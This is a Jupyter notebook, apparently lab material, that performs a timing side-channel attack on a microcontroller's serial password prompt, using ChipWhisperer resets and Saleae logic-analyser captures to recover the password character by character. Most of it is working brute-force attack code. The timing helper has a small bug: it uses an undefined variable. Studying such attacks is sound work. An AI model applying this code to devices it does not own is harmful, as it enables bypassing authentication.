# Timing attack

In this attack we are going to attempt a side-channel attack against the serial interface of our target device. We are going to monitor the duration of time the device takes to answer a login attempt in the serial interface. If the time it takes is dependent on the correctness of our input, we will be able to brute-force each character of the password in separate.

First, we need to initialize the chipwhisper nano that will be responsible for reseting the board whenever it is necessary and the serial connection.

In [ ]:
import chipwhisperer as cw
import time 

try:
    if not scope.connectStatus:
        scope.con()
except NameError:
    scope = cw.scope()

scope.default_setup()

# Initialize the FT232H
import serial
ser = serial.Serial('/dev/ttyUSB0',baudrate=115200)

# Function to reset the board
def reset_board():
    #Toggle reset
    ser.reset_input_buffer()
    scope.io.nrst = False
    time.sleep(0.05)
    scope.io.nrst = None #Pulls high by default
    time.sleep(0.05)

If during the test we remove and reconect the chipwhisper to the computer, we should run  the following cell that will reconnect it.

In [ ]:
scope.dis()
scope.con()
scope

The Salae logic analyser should be connected to the computer running this jupyter notebook, and the Logic 2 software should be running and with its remote API enabled.

The following code configures the logic analyser via its remote API, it set two capture channels that should be defined according to your physicial connection, the sample rate of the capture and its duration (1 second).

In [ ]:
from saleae import automation

# According to the target board
# It should be configure according to your physical configuration.
RX = 2
TX = 3


device_configuration = automation.LogicDeviceConfiguration(
    enabled_digital_channels=[RX, TX], 
    digital_sample_rate=24_000_000,
)

capture_configuration = automation.CaptureConfiguration(
    capture_mode=automation.TimedCaptureMode(duration_seconds=1)
)

The trace of the logic analyser is exported as a CSV file, imported to python as a pandas data frame and analysed by function `return_distance`. This function reads the logic trace and retrieves the time it took from receiving the authentication attempt and return the response.

In [ ]:
import pandas as pd

def return_distance(df: pd.DataFrame):
    df_1 = df.iloc[::-1]
    
    channel_TX_timestamp = -1
    channel_TX_index = -1
    channel_RX_timestamp = -1
    channel_RX_index = -1
    
    for index, row in df_1.iterrows():
        if row[f'Channel {TX}'] == 0:
            channel_TX_timestamp = row['Time [s]']
            channel_TX_index = index
            assert row[f'Channel {RX}'] == 1
            break
    
    i = channel3_index
    while True:
        if df_1.loc[i][f'Channel {RX}'] == 0:
            channel_RX_timestamp = df_1.loc[i]['Time [s]']
            channel_RX_index = i
            assert df_1.loc[i][f'Channel {TX}'] == 1
            break
        i += 1
    
    return channel_RX_timestamp - channel_TX_timestamp


The next cell will preform a brute force attack to the password. We assume that at most the password has 18 chacratcers, and we test each character 4 times for each index. The time the microncontroller takes to answer to these attempts is measure and the mean of these 4 attempts is stored. Finally, we compared mean time it took to respond to each character and select the correct charcter for each index. 

In [ ]:
from string import ascii_letters
from statistics import mean
import numpy
import os

possible_characters = ascii_letters

# Folder where the Salae dumps will be stored
capture_name = os.getcwd()+'/dumps'

current_string = b""
found = False

for _ in range(18):
    results = []

    for l in possible_characters:
        tries = []
        for _ in range(4):
            with automation.Manager.connect( port=10430) as manager:

                with manager.start_capture(
                    device_configuration=device_configuration,
                    capture_configuration=capture_configuration
                ) as capture:
                        reset_board()
                        ser.read_until(b'Password:')
                        ser.write(current_string+l.encode()+b"\n")
                        
                        capture.wait()
                        capture.export_raw_data_csv(capture_name,digital_channels=[2,3])
                        
                        if b'Correct password!' in ser.read_until(b'password!'):
                            print("Correct password found!")
                            print(current_string+l.encode())
                            found = True
                            break
                                      
            # read and process the CSV
            df = pd.read_csv(capture_name+'/digital.csv')
            tries.append(return_distance(df))
        
        if found:
            break
        results.append(mean(tries))

    
    if found:
        break
    current_string += possible_characters[results.index(numpy.max(results))].encode()
    
    # Print partial password
    print(current_string)
